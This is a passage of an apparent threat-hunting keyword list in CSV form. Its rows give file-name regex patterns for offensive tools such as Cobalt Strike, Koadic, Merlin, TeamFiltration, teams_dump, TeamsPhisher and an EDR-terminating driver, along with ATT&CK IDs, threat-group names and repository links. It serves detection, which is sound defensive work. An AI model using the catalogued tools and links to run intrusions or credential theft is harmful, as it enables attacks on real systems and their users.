Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11811" "*/targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\/targets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11812" "*/targets-ipv6-multicast-mld.nse*",".{0,1000}\/targets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11813" "*/targets-ipv6-multicast-slaac.nse*",".{0,1000}\/targets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11814" "*/targets-ipv6-wordlist.nse*",".{0,1000}\/targets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11815" "*/targets-sniffer.nse*",".{0,1000}\/targets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11816" "*/targets-traceroute.nse*",".{0,1000}\/targets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11817" "*/targets-xml.nse*",".{0,1000}\/targets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11818" "*/TartarusGate.git*",".{0,1000}\/TartarusGate\.git.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","11819" "*/Tash.dll*",".{0,1000}\/Tash\.dll.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11820" "*/TashClient.*",".{0,1000}\/TashClient\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11821" "*/TashLoader.*",".{0,1000}\/TashLoader\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11822" "*/Tater.ps1*",".{0,1000}\/Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","11823" "*/tccbypass.md*",".{0,1000}\/tccbypass\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11824" "*/TChopper.git*",".{0,1000}\/TChopper\.git.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","11825" "*/TCPMITM.py*",".{0,1000}\/TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","11826" "*/tcpshell.py*",".{0,1000}\/tcpshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11827" "*/TeamFiltration.dll*",".{0,1000}\/TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","11830" "*/TeamFiltration.exe*",".{0,1000}\/TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring 
O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","11831" "*/TeamFiltration/releases/latest*",".{0,1000}\/TeamFiltration\/releases\/latest.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","11832" "*/Teamphisher.txt*",".{0,1000}\/Teamphisher\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","11833" "*/Teamphisher/targets.txt*",".{0,1000}\/Teamphisher\/targets\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","11834" "*/teams_cookies_output.json*",".{0,1000}\/teams_cookies_output\.json.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11835" "*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11836" "*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11837" "*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11838" "*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11839" "*/teams_localdb.py*",".{0,1000}\/teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 
- T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11840" "*/TeamsEnum.git*",".{0,1000}\/TeamsEnum\.git.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","1","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","11841" "*/teamsenum.py*",".{0,1000}\/teamsenum\.py.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","1","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","11842" "*/teamserver.service*",".{0,1000}\/teamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","#linux","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","11843" "*/TeamServer_linux *",".{0,1000}\/TeamServer_linux\s.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#linux","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","11844" "*/TeamServer_win.exe*",".{0,1000}\/TeamServer_win\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","11845" "*/teamserver-linux.tar.gz*",".{0,1000}\/teamserver\-linux\.tar\.gz.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","#linux","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","11846" "*/teamserver-win.zip*",".{0,1000}\/teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","11847" "*/teamspeak2-version.nse*",".{0,1000}\/teamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11848" "*/teamstracker.db*",".{0,1000}\/teamstracker\.db.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","11849" "*/teamstracker.git*",".{0,1000}\/teamstracker\.git.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","11850" "*/teamstracker.py*",".{0,1000}\/teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user 
presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","11851" "*/TelegramRAT.git*",".{0,1000}\/TelegramRAT\.git.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","11857" "*/Telemetry.git*",".{0,1000}\/Telemetry\.git.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","1","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","11858" "*/telnet_cdata_ftth_backdoor_userpass.txt*",".{0,1000}\/telnet_cdata_ftth_backdoor_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11859" "*/telnet-brute.nse*",".{0,1000}\/telnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11860" "*/telnet-encryption.nse*",".{0,1000}\/telnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11861" "*/telnet-ntlm-info.nse*",".{0,1000}\/telnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11862" "*/terminate/Terminator.sys*",".{0,1000}\/terminate\/Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","11863" "*/test_privesc.py*",".{0,1000}\/test_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11864" "*/test32.dll*",".{0,1000}\/test32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
